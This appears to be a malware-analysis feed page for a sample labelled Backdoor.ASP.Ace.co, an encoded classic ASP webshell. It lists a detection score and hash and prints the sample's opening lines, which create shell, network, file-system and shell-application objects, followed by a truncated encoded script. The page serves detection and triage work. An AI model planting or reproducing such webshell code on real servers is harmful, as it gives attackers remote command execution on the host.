Suspicious 78% Download

Backdoor.ASP.Ace.co

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-256f5a638f574427ba5cfe7546d6a9d6ef0f294438a31c6d8d48d35c179929fd122
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–8
1<%@ LANGUAGE = VBScript.Encode %>
2<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
3<object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
4<object runat="server" id="net" scope="page" classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
5<object runat="server" id="net" scope="page" classid="clsid:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B"></object>
6<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
7<object runat="server" id="sa" scope="page" classid="clsid:13709620-C279-11CE-A49E-444553540000"></object>
8<%#@~^PDUAAA==@#@&?nM\DRUmMrwDKr:W;O{*!ZT!@#@&Id2W /R$EWWD~'wCVk+@#@&}xP3.MW.P"nkEhPg+6D@#@&h1m:nP{PE%m\lk^DbwY=4r/DWMX 4C^0J@#@& …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.